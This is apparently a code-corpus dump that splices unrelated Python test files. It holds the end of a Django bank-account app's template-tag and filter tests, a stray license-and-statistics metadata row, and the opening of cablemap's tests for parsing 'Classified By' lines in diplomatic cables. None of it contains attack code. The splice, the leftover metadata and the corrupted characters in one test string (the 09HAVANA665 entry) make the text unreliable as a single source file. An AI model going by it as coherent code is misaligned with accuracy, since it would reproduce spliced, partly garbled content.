self.assertEqual(msg.type, 'info')
else:
self.assertIsNone(msg.type)
i += 1
def test_payment_method(self):
context = payment_method(BankTransaction.PAYMENT_METHOD_CREDIT_CARD)
self.assertIsNotNone(context)
context = payment_method(BankTransaction.PAYMENT_METHOD_CASH)
self.assertIsNotNone(context)
context = payment_method(BankTransaction.PAYMENT_METHOD_TRANSFER)
self.assertIsNotNone(context)
context = payment_method(BankTransaction.PAYMENT_METHOD_TRANSFER_INTERNAL)
self.assertIsNotNone(context)
context = payment_method(BankTransaction.PAYMENT_METHOD_CHECK)
self.assertIsNotNone(context)
def test_breadcrumb(self):
bankaccount = BankAccountFactory()
kwargs = {
"bankaccount_pk": bankaccount.pk,
}
request = mock.Mock(path=reverse('banktransactions:create', kwargs=kwargs))
context = breadcrumb(request)
self.assertListEqual(
[reverse('banktransactions:list', kwargs=kwargs)],
[link['href'] for link in context['links']]
)
banktransaction = BankTransactionFactory(bankaccount=bankaccount)
request = mock.Mock(path=reverse('banktransactions:update', kwargs={
'pk': banktransaction.pk,
}))
context = breadcrumb(request, banktransaction.bankaccount.pk)
self.assertListEqual(
[reverse('banktransactions:list', kwargs=kwargs)],
[link['href'] for link in context['links']]
)
request = mock.Mock(path=reverse('banktransactionschedulers:create', kwargs=kwargs))
context = breadcrumb(request)
self.assertListEqual(
[
reverse('banktransactions:list', kwargs=kwargs),
reverse('banktransactionschedulers:list', kwargs=kwargs),
],
[link['href'] for link in context['links']]
)
banktransaction = BankTransactionFactory(bankaccount=bankaccount)
request = mock.Mock(path=reverse('banktransactionschedulers:update', kwargs={
'pk': banktransaction.pk,
}))
context = breadcrumb(request, banktransaction.bankaccount.pk)
self.assertListEqual(
[
reverse('banktransactions:list', kwargs=kwargs),
reverse('banktransactionschedulers:list', kwargs=kwargs),
],
[link['href'] for link in context['links']]
)
class TemplateTagsWebTestCase(WebTest):
@classmethod
def setUpTestData(cls):
cls.owner = UserFactory(username='owner')
cls.superowner = UserFactory(username='superowner', user_permissions='admin')
cls.bankaccount = BankAccountFactory(owners=[cls.owner, cls.superowner])
def test_menu_action_links(self):
url = reverse('bankaccounts:list')
href = reverse('bankaccounts:create')
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
url = reverse('banktransactiontags:list')
href = reverse('banktransactiontags:create')
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
url = reverse('banktransactions:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactions:create', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
href = reverse('bankaccounts:delete', kwargs={
'pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
url = reverse('banktransactions:calendar', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactions:create', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
href = reverse('bankaccounts:delete', kwargs={
'pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
url = reverse('banktransactionschedulers:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactionschedulers:create', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
def test_menu_tab_links(self):
url = reverse('banktransactions:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('bankaccounts:update', kwargs={
'pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
response = self.app.get(url, user='owner')
with self.assertRaises(IndexError):
response.click(href=href)
def test_menu_item_links(self):
url = reverse('banktransactionanalytics:ratio', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactionanalytics:trendtime', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
href = reverse('banktransactionanalytics:ratio', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response.click(href=href, index=1)
url = reverse('banktransactions:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
href = reverse('banktransactions:calendar', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response = self.app.get(url, user='superowner')
response.click(href=href)
href = reverse('banktransactions:list', kwargs={
'bankaccount_pk': self.bankaccount.pk
})
response.click(href=href, index=1)
class TemplateFiltersWebTestCase(unittest.TestCase):
def test_merge_form_errors(self):
form = mock.Mock(
non_field_errors=mock.Mock(return_value=[]),
visible_fields=mock.Mock(return_value=[]),
)
self.assertListEqual(merge_form_errors(form), [])
form = mock.Mock(
non_field_errors=mock.Mock(return_value=["foo", "bar"]),
visible_fields=mock.Mock(return_value=[]),
)
self.assertListEqual(merge_form_errors(form), ["foo", "bar"])
form = mock.Mock(
non_field_errors=mock.Mock(return_value=[]),
visible_fields=mock.Mock(
return_value=[
mock.Mock(errors=["baz", "alpha"]),
]
),
)
self.assertListEqual(merge_form_errors(form), ["baz", "alpha"])
form = mock.Mock(
non_field_errors=mock.Mock(return_value=["foo", "bar"]),
visible_fields=mock.Mock(
return_value=[
mock.Mock(errors=["baz", "alpha"]),
mock.Mock(errors=["beta"]),
mock.Mock(errors=[]),
]
),
)
self.assertListEqual(
merge_form_errors(form),
["foo", "bar", "baz", "alpha", "beta"]
)
def test_form_errors_exists(self):
form = mock.Mock(
non_field_errors=mock.Mock(
return_value=mock.Mock(
as_data=mock.Mock(
return_value=[
mock.Mock(code='foo'),
mock.Mock(code='bar'),
]
)
)
)
)
self.assertTrue(form_errors_exists(form, 'bar'))
self.assertFalse(form_errors_exists(form, 'baz'))
class TemplateFiltersTestCase(SimpleTestCase):
def test_language_to_upper(self):
self.assertEqual(language_to_upper('en-us'), 'en-US')
self.assertEqual(language_to_upper('fr-fr'), 'fr-FR')
self.assertEqual(language_to_upper('fr'), 'fr')
def test_currency_positive(self):
with self.settings(LANGUAGE_CODE='en-us'):
self.assertEqual(
currency_positive(Decimal('1547.23'), 'USD'),
"+$1,547.23",
)
with self.settings(LANGUAGE_CODE='fr-fr'):
self.assertEqual(
currency_positive(Decimal('1547.23'), 'EUR'),
'+1\xa0547,23\xa0€',
)
def test_localize_positive(self):
with self.settings(LANGUAGE_CODE='en-us'):
self.assertEqual(
localize_positive(Decimal('15.23')),
'+15.23',
)
with self.settings(LANGUAGE_CODE='fr-fr'):
self.assertEqual(
localize_positive(Decimal('15.23')),
'+15,23',
)
def test_localize_positive_color(self):
with self.settings(LANGUAGE_CODE='en-us'):
s = localize_positive_color(Decimal('15.23'))
self.assertIsInstance(s, SafeText)
self.assertEqual(s, '<p class="text-success">+15.23</p>')
s = localize_positive_color(Decimal('-15.23'))
self.assertIsInstance(s, SafeText)
self.assertEqual(s, '<p class="text-danger">-15.23</p>')
with self.settings(LANGUAGE_CODE='fr-fr'):
s = localize_positive_color(Decimal('15.23'))
self.assertIsInstance(s, SafeText)
self.assertEqual(s, '<p class="text-success">+15,23</p>')
s = localize_positive_color(Decimal('-15.23'))
self.assertIsInstance(s, SafeText)
self.assertEqual(s, '<p class="text-danger">-15,23</p>')
| bsd-3-clause | 8,614,120,296,105,935,000 | 34.086705 | 92 | 0.584596 | false |
heuer/cablemap | cablemap.core/tests/test_reader_classified_by.py | 1 | 39464 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2011 - 2015 -- Lars Heuer <heuer[at]semagia.com>
# All rights reserved.
#
# License: BSD, see LICENSE.txt for more details.
#
"""\
Tests classificationist parsing.
:author: Lars Heuer (heuer[at]semagia.com)
:organization: Semagia - <http://www.semagia.com/>
:license: BSD license
"""
from nose.tools import eq_, ok_
from cablemap.core import cable_by_id
from cablemap.core.reader import parse_classified_by
_TEST_DATA = (
(u'10TOKYO397', u'Marc Wall', u'''FIELD
REF: STATE 015541
Classified By: Acting Deputy Chief of Mission Marc Wall for Reasons 1.4
(b) and (d)
¶1. (C) SUM'''),
(u'10GENEVA249', u'Rose E. Gottemoeller', u'''REF: 10 GENEVA 231 (SFO-GVA-VIII-088) CLASSIFIED BY: Rose E. Gottemoeller, Assistant Secretary, Department of State, VCI; REASON: 1.4(B), (D) '''),
(u'10GENEVA247', u'Rose E. Gottemoeller', u'''REF: 10 GENEVA 245 (SFO-GVA-VIII-086) CLASSIFIED BY: Rose E. Gottemoeller, Assistant Secretary, Department of State, VCI; REASON: 1.4(B), (D) ¶1. (U) This '''),
(u'10UNVIEVIENNA77', u'Glyn T. Davies', u'''\nClassified By: Ambassador Glyn T. Davies for reasons 1.4 b and d '''),
(u'10WARSAW117', u'F. Daniel Sainz', u'''\nClassified By: Political Counselor F. Daniel Sainz for Reasons 1.4 (b) and (d) '''),
(u'10STATE16019', u'Karin L. Look', u'''\nClassified By: Karin L. Look, Acting ASSISTANT SECRETARY, VCI. Reason: 1.4 (b) and (d).'''),
(u'10LILONGWE59', u'Bodde Peter', u'''\nCLASSIFIED BY: Bodde Peter, Ambassador; REASON: 1.4(B) '''),
(u'95ZAGREB4339', u'ROBERT P. FINN', u'''
1. (U) CLASSIFIED BY ROBERT P. FINN, DEPUTY CHIEF OF
MISSION. REASON: 1.5 (D)
'''),
(u'95DAMASCUS5748', u'CHRISTOPHER W.S. ROSS', u'''SUBJECT: HAFIZ AL-ASAD: LAST DEFENDER OF ARABS
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY:
CHRISTOPHER W.S. ROSS, AMBASSADOR. REASON: 1.5 (D) .
2. SUMMAR'''),
(u'95TELAVIV17504', (), u'''
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY SECTION 1.5 (B)
AND (D). NIACT PRECEDENCE BECAUSE OF GOVERNMENT CRISIS IN
ISRAEL.
2. SU'''),
(u'95RIYADH5221', u'THEODORE KATTOUF', u'''
1. CONFIDENTIAL - ENTIRE TEXT. CLASSIFIED BY DCM
THEODORE KATTOUF - 1.5 B,D.
2. (C)'''),
(u'96ADDISABABA1545', u'JEFFREY JACOBS', u'''
1. (U) CLASSIFIED BY POLOFF JEFFREY JACOBS, 1.5 (D).
2. (C)'''),
(u'96AMMAN2094', u'ROBERT BEECROFT', u'''
1. (U) CLASSIFIED BY CHARGE ROBERT BEECROFT; REASON 1.5 (D).
2. (C) '''),
(u'96STATE86789', u'MARY BETH LEONARD', u'''
1. CLASSIFIED BY AF/C - MARY BETH LEONARD, REASON 1.5
(D). '''),
(u'96NAIROBI6573', u'TIMOTHY CARNEY', u'''
1. CLASSIFIED BY AMBASSADOR TO SUDAN TIMOTHY CARNEY.
REASON 1.5(D).
'''),
(u'96RIYADH2406', u'THEODORE KATTOUF', u'''SUBJECT: CROWN PRINCE ABDULLAH THE DIPLOMAT
1. (U) CLASSIFIED BY CDA THEODORE KATTOUF, REASON 1.5.D.
2. '''),
(u'96RIYADH2696', u'THEODORE KATTOUF', u'''
1. (U) CLASSIFIED BY CHARGE D'AFFAIRES THEODORE
KATTOUF: 1.5 B, D.
'''),
(u'96ISLAMABAD5972', u'THOMAS W. SIMONS, JR.', u'''
1. (U) CLASSIFIED BY THOMAS W. SIMONS, JR., AMBASSADOR.
REASON: 1.5 (B), (C) AND (D).
'''),
(u'96ISLAMABAD5972', u'Thomas W. Simons, Jr.', u'''
1. (U) CLASSIFIED BY THOMAS W. SIMONS, JR., AMBASSADOR.
REASON: 1.5 (B), (C) AND (D).
''', True),
(u'96STATE183372', u'LEE 0. COLDREN', u'''
1. (U) CLASSIFIED BY LEE 0. COLDREN, DIRECTOR, SA/PAB,
DEPARTMENT OF STATE. REASON: 1.5(D).
'''),
(u'96STATE183372', u'Lee O. Coldren', u'''
1. (U) CLASSIFIED BY LEE 0. COLDREN, DIRECTOR, SA/PAB,
DEPARTMENT OF STATE. REASON: 1.5(D).
''', True),
(u'96ASHGABAT2612', u'TATIANA C. GFOELLER', u'''
1. (U) CLASSIFIED BY CHARGE TATIANA C. GFOELLER.
REASON: 1.5 D.
'''),
(u'96BOGOTA8773', u'S.K. ABEYTA', u'''
1. CLASSIFIED BY POL/ECONOFF. S.K. ABEYTA. REASON: 1.5(D)
'''),
(u'96STATE194868', u'E. GIBSON LANPHER, JR.', u'''
1. (U) CLASSIFIED BY E. GIBSON LANPHER, JR., ACTING
ASSISTANT SECRETARY OF STATE FOR SOUTH ASIAN AFFAIRS,
DEPARTMENT OF STATE. REASON: 1.5(D).
'''),
(u'96JAKARTA7841', u'ED MCWILLIAMS', u'''
1. (U) CLASSIFIED BY POL COUNSELOR ED MCWILLIAMS;
REASON 1.5(D)
'''),
(u'96JERUSALEM3094', u'EDWARD G. ABINGTON, JR.', u'''
1. CLASSIFIED BY CONSUL GENERAL EDWARD G. ABINGTON, JR. REASON
1.5 (B) AND (D).
'''),
(u'96BOGOTA10967', u'S.K. ABEYTA', u'''
1. (U) CLASSIFIED BY POL/ECONOFF S.K. ABEYTA. REASON 1.5(D).
'''),
(u'04MUSCAT2112', u'Richard L. Baltimore, III', u'''
Classified By: Ambassador Richard L. Baltimore, III.
Reasons: 1.4 (b) and (d).
'''),
(u'04MUSCAT2112', u'Richard L. Baltimore, III', u'''
Classified By: Ambassador Richard L. Baltimore, III.
Reasons: 1.4 (b) and (d).
''', True),
(u'05OTTAWA1975', u'Patricia Kim-Scott', u'''
Classified By: Pol/Mil Officer Patricia Kim-Scott. Reason E.O. 12958,
1.4 (b) and (d).
'''),
(u'05BOGOTA6208', u'William B. Wood', u'''
Classified By: Ambassador William B. Wood; reasons 1.4
(b) and (d)
'''),
(u'05TAIPEI2839', u'Douglas Paal', u'''
Classified By: AIT Director Douglas Paal, Reason(s): 1.4 (B/D).
'''),
(u'05DHAKA3073', u'D.C. McCullough', u'''
Classified By: A/DCM D.C. McCullough, reason para 1.4 (b)
'''),
(u'09NAIROBI1132', u'Jessica Davis Ba', u'''
Classified By: Pol/Econ Officer Jessica Davis Ba for reasons 1.4(b) and
(d)
'''),
(u'08ROME1541', u'Liz Dibble', u'''
Classified By: Classified by DCM Liz Dibble for reasons 1.4 (b) and
(d).
'''),
(u'06BAGHDAD2082', u'DANIEL SPECKHARD', ur'''
Classified By: CHARGE D\'AFFAIRES DANIEL SPECKHARD FOR REASONS 1.4 (A),
(B) AND (D)
'''),
(u'05ANKARA4653', u'Nancy McEldowney', u'''
Classified By: (U) CDA Nancy McEldowney; E.O. 12958, reasons 1.4 (b,d)
'''),
(u'05QUITO2057', u'LARRY L. MEMMOTT', u'''
Classified By: ECON LARRY L. MEMMOTT, REASONS 1.4 (B,D)
'''),
(u'06HONGKONG3559', u'LAURENT CHARBONNET', u'''
CLASSIFIED BY: ACTING DEPUTY PRINCIPAL OFFICER LAURENT CHARBONNET. REA
SONS: 1.4 (B,D)
'''),
(u'09BAGHDAD791', u'Patricia Butenis', u'''
Classified By: Charge d\' Affairs Patricia Butenis for reasons 1.4 (b) a
nd (d)
'''),
(u'06OSLO19', u'Christopher W. Webster', u'''
Classified By: Charge d\'Affaires a.i. Christopher W. Webster,
reason 1.4 (b) and (d)
'''),
(u'08BEIJING3386', u'Aubrey Carlson', u'''
Classified By: Political Section Minister Counselor Aubrey Carlson. Re
asons 1.4 (b/d).
'''),
(u'09MOSCOW2393', u'Susan M. Elliott', u'''
Classified By: Political Minister Counselor Susan M. Elliott for reason
s: 1.4 (b), (d).
'''),
(u'10BRUSSELS66', u'Christopher R. Davis', u'''
Classified By: Political Minister-Counselor Christopher R. Davis for re
ason 1.4 (b/d)
'''),
(u'06BEIJING22125', u'ROBERT LUKE', u'''
Classified By: (C) CLASSIFIED BY MINISTER COUNSELOR FOR ECONOMIC AFFAIR
S ROBERT LUKE; REASON 1.4 (B) AND (D).
'''),
(u'07CAIRO622', u'William R. Stewart', u'''
Classified by: Minister Counselor for Economic and
Political Affairs William R. Stewart for reasons 1.4(b) and
(d).
'''),
(u'07BAGHDAD1188', u'Daniel Speckhard', u'''
Classified By: Charge Affaires Daniel Speckhard. Reasons: 1.4 (b) and
(d).
'''),
(u'08PARIS1131', u'STUART DWYER', u'''
Classified By: ECONCOUNS STUART DWYER FOR REASONS 1.4 B AND D
'''),
(u'08ATHENS985', u'Jeff Hovenier', u'''
Classified By: A/Political Counselor Jeff Hovenier for
1.4 (b) and (d)
'''),
(u'09BEIJING2690', u'William Weinstein', u'''
Classified By: This message classified by Econ Minister Counselor
William Weinstein for reasons 1.4 (b), (d) and (e).
'''),
(u'06VILNIUS945', u'Rebecca Dunham', u'''
Classified By: Political and Economic Section Chief Rebecca Dunham for
reasons 1.4 (b) and (d)
'''),
(u'07BAGHDAD2781', u'Howard Keegan', u'''
Classified By: Kirkuk PRT Team Leader Howard Keegan for reason 1.4 (b)
and(d).
'''),
(u'09HARARE864', u'Donald Petterson', u'''
Classified By: Charge d\'affaires, a.i. Donald Petterson for reason 1.4
(b).
'''),
(u'04MANAMA525', u'Robert S. Ford', u'''
Classified By: Charge de Affaires Robert S. Ford for reasons
1.4 (b) and (d).
'''),
(u'08STATE56778', u'Patricia A. McNerney', u'''
Classified By: ISN Acting Assistant Secretary
Patricia A. McNerney, Reasons 1.4 b, c, and d
'''),
(u'07BRUSSELS1462', u'Larry Wohlers', u'''
Classified By: USEU Political Minister Counselor Larry Wohlers
for reasons 1.4 (b) and (d).
'''),
(u'09KABUL2261', u'Hoyt Yee', u'''
Classified By: Interagency Provincial Affairs Deputy Coordinator Hoyt Y
ee for reasons 1.4 (b) and (d)
'''),
(u'09KABUL1233', u'Patricia A McNerney', u'''
Classified By: PRT and Sub-National Governance Acting Director Patricia
A McNerney for reasons 1.4 (b) and (d)
'''),
(u'09BRUSSELS1288', u'CHRISTOPHER DAVIS', u'''
Classified By: CLASSIFIED BY USEU MCOUNSELOR CHRISTOPHER DAVIS, FOR REA
SONS 1.4 (B) AND (D)
'''),
(u'06TAIPEI3165', u'Stephen M. Young', u'''
Classified By: Classified by AIT DIR Stephen M. Young.
Reasons: 1.4 b, d.
'''),
(u'07BRUSSELS1208', u'Courtney Nemroff', u'''
Classified By: Institutional Affairs Unit Chief Courtney Nemroff for re
asons 1.4 (b) & (d)
'''),
(u'05CAIRO8602', u'Michael Corbin', u'''
Classified by ECPO Minister-Counselour Michael Corbin for
reasons 1.4 (b) and (d).
'''),
(u'09MADRID1210', u'Arnold A. Chacon', u'''
Classified By: Charge d'Affaires, a.i., Arnold A. Chacon
1.(C) Summary: In his meetings with Spanish officials,
Special Envoy for Eurasian Energy'''),
(u'05SINGAPORE887', u'Laurent Charbonnet', u'''
Classified By: E/P Counselor Laurent Charbonnet, Reasons 1.4(b)(d)
'''),
(u'09SINGAPORE677', u'Dan Jassem', u'''
Classified By: Acting E/P Counselor Dan Jassem for reasons 1.4 (b) and
(d)
'''),
(u'08BELGRADE1189', u'Thatcher Scharpf', u'''
Classified By: Acting Deputy Chief of Mission Thatcher Scharpf for reas
ons 1.4(b/d).
'''),
(u'09BAGHDAD3319', u'Rachna Korhonen', u'''
Classified By: PRT Kirkuk Governance Section Head Rachna Korhonen for r
easons 1.4 (b) and (d).
'''),
(u'04ANKARA5897', u'Thomas Goldberger', u'''
Classified By: (U) Classified by Economic Counselor Thomas Goldberger f
or reasons 1.4 b,d.
'''),
(u'00HARARE3759', u'TOM MCDONALD', u'''
CLASSIFIED BY AMBASSADOR TOM MCDONALD.
CONFIDENTIAL
PAGE 02 HARARE 03759 01 OF 03 111533Z
REASONS: 1.5 (B) AND (D).
1. (C) SUMMARY: ALTHOUGH WIDESPREAD FEARS OF A
SPIKE'''),
(u'07STATE156455', u'Glyn T. Davies', u'''
Classified By: Glyn T. Davies
SUMMARY
-------
'''),
(u'03GUATEMALA1727', u'Erik Hall', u'''
Classified By: Labor Attache Erik Hall. Reason 1.5 (d).
'''),
(u'05VILNIUS503', u'LARRY BEISEL', u'''
Classified By: DEFENSE ATTACHE LTC LARRY BEISEL FOR REASONS 1.4 (B) AND
(D).
'''),
(u'08USUNNEWYORK729', u'Carolyn L. Willson', u'''
Classified By: USUN Legal Adviser Carolyn L. Willson, for reasons
1.4(b) and (d)
'''),
(u'04BRUSSELS4688', u'Jeremy Brenner', u'''
Classified By: USEU polmil officer Jeremy Brenner for reasons 1.4 (b) a
nd (d)
'''),
(u'08GUATEMALA1416', u'Drew G. Blakeney', u'''
Classified By: Pol/Econ Couns Drew G. Blakeney for reasons 1.4 (b&d).
'''),
(u'08STATE77798', u'Brian H. Hook', u'''
Classified By: IO Acting A/S Brian H. Hook, E.O. 12958,
Reasons: 1.4(b) and (d)
'''),
(u'05ANKARA1071', u'Margaret H. Nardi', u'''
Classified By: Acting Counselor for Political-Military Affiars Margaret
H. Nardi for reasons 1.4 (b) and (d).
'''),
(u'08MOSCOW3655', u'David Kostelancik', u'''
Classified By: Deputy Political M/C David Kostelancik. Reasons 1.4 (b)
and (d).
'''),
(u'09STATE75025', u'Richard C. Holbrooke', u'''
Classified By: Special Representative for Afghanistan and Pakistan
Richard C. Holbrooke
1. (U) This is an action request; see paragraph 4.
'''),
(u'10KABUL688', u'Joseph Mussomeli', u'''
Classified By: Assistant Chief of Mission Joseph Mussomeli for Reasons
1.4 (b) and (d)
'''),
(u'98USUNNEWYORK1638', u'HOWARD STOFFER', u'''
CLASSIFIED BY DEPUTY POLITICAL COUNSEL0R HOWARD STOFFER
PER 1.5 (B) AND (D). ACTION REQUEST IN PARA 10 BELOW.
'''),
(u'02ROME3119', u'PIERRE-RICHARD PROSPER', u'''
CLASSIFIED BY: AMBASSADOR-AT-LARGE PIERRE-RICHARD PROSPER
FOR REASONS 1.5 (B) AND (D)
'''),
(u'02ANKARA8447', u'Greta C. Holtz', u'''
Classified by Consul Greta C. Holtz for reasons 1.5 (b) & (d).
'''),
(u'09USUNNEWYORK282', u'SUSAN RICE', u'''
Classified By: U.S. PERMANENT REPRESENATIVE AMBASSADOR SUSAN RICE
FOR REASONS 1.4 B/D
'''),
(u'09DHAKA339', u'Geeta Pasi', u'''
Classified By: Charge d'Affaires, a.i. Geeta Pasi. Reasons 1.4 (b) and
(d)
'''),
(u'06USUNNEWYORK2273', u'Alejandro D. Wolff', u'''
Classified By: Acting Permanent Representative Alejandro D. Wolff
per reasons 1.4 (b) and (d)
'''),
(u'08ISLAMABAD1494', u'Anne W. Patterson', u'''
Classified By: Ambassador Anne W. Patterson for reaons 1.4 (b) and (d).
1. (C) Summary: During'''),
(u'08BERLIN1150', u'Robert Pollard', u'''
Classified By: Classified by Economic Minister-Counsellor
Robert Pollard for reasons 1.4 (b) and (d)
'''),
(u'08STATE104902', u'DAVID WELCH', u'''
Classified By: 1. CLASSIFIED BY NEA ASSISTANT SECRETARY DAVID WELCH
REASONS: 1.4 (B) AND (D)
'''),
(u'07VIENTIANE454', u'Mary Grace McGeehan', u'''
Classified By: Charge de'Affairs ai. Mary Grace McGeehan for reasons 1.
4 (b) and (d)
'''),
(u'07ROME1948', u'William Meara', u'''
Classified By: Acting Ecmin William Meara for reasons 1.4 (b) and (d)
'''),
(u'07USUNNEWYORK545', u'Jackie Sanders', u'''
Classified By: Amb. Jackie Sanders. E.O 12958. Reasons 1.4 (B&D).
'''),
(u'06USOSCE113', u'Bruce Connuck', u'''
Classified By: Classified by Political Counselor Bruce Connuck for Reas
(b) and (d).
'''),
(u'09DOHA404', u'Joseph LeBaron', u'''
Classified By: Ambassaor Joseph LeBaron for reasons 1.4 (b and d).
'''),
(u'09DOHA404', u'Joseph LeBaron', u'''
Classified By: Ambassaor Joseph LeBaron for reasons 1.4 (b and d).
''', True),
(u'09RANGOON575', u'Thomas Vajda', u'''
Classified By: Charge d'Afairs (AI) Thomas Vajda for Reasons 1.4 (b) &
(d
'''),
(u'03ROME3107', u'TOM COUNTRYMAN', u'''
Classified By: POL MIN COUN TOM COUNTRYMAN, REASON 1.5(B)&(D).
'''),
(u'06USUNNEWYORK732', u'Molly Phee', u'''
Classified By: Deputy Political Counselor Molly Phee,
for Reasons 1.4 (B and D)
'''),
(u'06BAGHDAD1552', u'David M. Satterfield', u'''
Classified By: Charge d'Affaires David M. Satterfield for reasons 1.4 (
b) and (d)
'''),
(u'06ABUJA232', u'Erin Y. Tariot', u'''
Classified By: USDEL Member Erin Y. Tariot, reasons 1.4 (b,d)
'''),
(u'09ASTANA184', u'RICAHRD E. HOAGLAND', u'''
Classified By: AMBASSADOR RICAHRD E. HOAGLAND: 1.2 (B), (D)
'''),
(u'09ASTANA184', u'Richard E. Hoagland', u'''
Classified By: AMBASSADOR RICAHRD E. HOAGLAND: 1.2 (B), (D)
''', True),
(u'09CANBERRA428', u'John W. Crowley', u'''
Classified By: Deputy Political Counselor: John W. Crowley, for reasons
1.4 (b) and (d)
'''),
(u'08TASHKENT706', u'Molly Stephenson', u'''
Classified By: Classfied By: IO Molly Stephenson for reasons 1.4 (b) a
nd (d).
'''),
(u'08CONAKRY348', u'T. SCOTT BROWN', u'''
Classified By: ECONOFF T. SCOTT BROWN FOR REASONS 1.4 (B) and (D)
'''),
(u'07STATE125576', u'Margaret McKelvey', u'''
Classified By: PRM/AFR Dir. Margaret McKelvey-reasons 1.4(b/d)
'''),
(u'09BUDAPEST372', u'Steve Weston', u'''
Classified By: Acting Pol/Econ Counselor:Steve Weston,
reasons 1.4 (b and d)
'''),
(u'04TAIPEI3162', u'David J. Keegan', u''''
Classified By: AIT Deputy Director David J. Keegan, Reason: 1.4 (B/D)
'''),
(u'04TAIPEI3521', u'David J. Keegan', u'''
Classified By: AIT Acting Director David J. Keegan, Reason: 1.4 (B/D)
'''),
(u'04TAIPEI3919', u'David J. Keegan', u'''
Classified By: AIT Director David J. Keegan, Reason 1.4 (B/D)
'''),
(u'08JAKARTA1142', u'Stanley A. Harsha', u'''
Classified By: Acting Pol/C Stanley A. Harsha for reasons 1.4 (b+d).
'''),
(u'06ISLAMABAD16739', u'MARY TOWNSWICK', u'''
Classified By: DOS CLASSIFICATION GUIDE BY MARY TOWNSWICK
1. (C) Summary. With limited government support, Islamic
banking has gained momentum in Pakistan in the past three
years. The State Bank of Pakistan (SBP) reports that the
capital base of the Islamic banking system has more than
doubled since 2003 as the number of Islamic banks operating
in Pakistan rose from one to four. A media analysis of
Islamic banking in Pakistan cites an increase in the number
of conventional banks'''),
(u'05DJIBOUTI802', u'JEFFREY PURSELL', u'''
(U) CLASSIFIED BY TDY RSO JEFFREY PURSELL FOR REASON 1.5 C.
'''),
(u'09STATE82567', u'Eliot Kang', u'''
Classified By: Acting DAS for ISN Eliot Kang. Reasons 1.4 (b) and (d)
'''),
(u'04ANKARA5764', u'Charles O. Blaha', u'''
Classified By: Classified by Deputy Political Counselor Charles O. Blah
a, E.O. 12958, reasons 1.4 (b) and (d).
'''),
(u'04ANKARA5764', u'Charles O. Blaha', u'''
Classified By: Classified by Deputy Political Counselor Charles O. Blah
a, E.O. 12958, reasons 1.4 (b) and (d).
''', True),
(u'10VIENNA195', u'J. Dean Yap', u'''
Classified by: DCM J. Dean Yap (acting) for reasons 1.4 (b)
and (d).
'''),
(u'03HARARE175', u'JOHN S. DICARLO', u'''
Classified By: RSO - JOHN S. DICARLO. REASON 1.5(D)
'''),
(u'08LONDON2968', u'Greg Berry', u'''
Classified By: PolMinCons Greg Berry, reasons 1.4 (b/d).
'''),
(u'08HAVANA956', u'Jonathan Farrar', u'''
Classified By: COM Jonathan Farrar for reasons 1.5 (b) and (d)
'''),
(u'09BAGHDAD253', u'Robert Ford', u'''
Classified By: Acting Deputy Robert Ford. Reasons 1.4 (b) and (d)
'''),
(u'09TIRANA81', u'JOHN L. WITHERS II', u'''
Classified By: AMBASSADOR JOHN L. WITHERS II FR REASONS 1.4 (b) AND (d
).
'''),
(u'05HARARE383', u'Eric T. Schultz', u'''
Classified By: Charge d'Affaires a.i. Eric T. Schultz under Section 1.4
b/d
'''),
(u'07LISBON2591', u'Jenifer Neidhart', u'''
Classified By: Pol/Econ Off Jenifer Neidhart for reasons 1.4 (b) and (d
)
'''),
(u'07STATE171234', u'Lawrence E. Butler', u'''
Classified By: NEA Lawrence E. Butler for reasons EO 12958
1.4(b),(d), and (e).
'''),
(u'04AMMAN8544', u'David Hale', u'''
Classified By: Charge d'Affaries David Hale for Reasons 1.4 (b), (d)
'''),
(u'07NEWDELHI5334', u'Ted Osius', u'''
Classified By: Acting DCM/Ted Osius for reasons 1.4 (b and d)
'''),
(u'04JAKARTA5072', u'ANTHONY C. WOODS', u'''
Classified By: EST&H OFFICER ANTHONY C. WOODS FOR REASON 1.5 (b, d)
'''),
(u'03AMMAN2822', u'Edward W. Gnehm', u'''
Classified By: Ambassador Edward W. Gnehm. Resons 1.5 (B) and (D)
'''),
(u'08CANBERRA1335', u'Daniel A. Clune', u'''
Classified By: Deputy Chief of Mission: Daniel A. Clune: Reason: 1.4 (c
) and (d)
'''),
(u'09HAVANA665', u'Charles Barclay', u'''
Classified By: CDA: Charles Barclay for reQ#8$UQ8ML#C may choke oQhQGTzovisional\" controls, such as
price caps and limits on the amount any one person could buy.
3. (SBU) Furthering speculation that the private markets
were under the gun, official reports have resurfaced in
recent months accusing private markets of artificially
maintaining higher'''),
(u'08STATE8993', u'Gregory B. Starr', u'''
1. (U) Classified by Acting Assistant Secretary for Diplomatic
Security Gregory B. Starr for E.O. 12958 reasons 1.4 (c) and
(d).
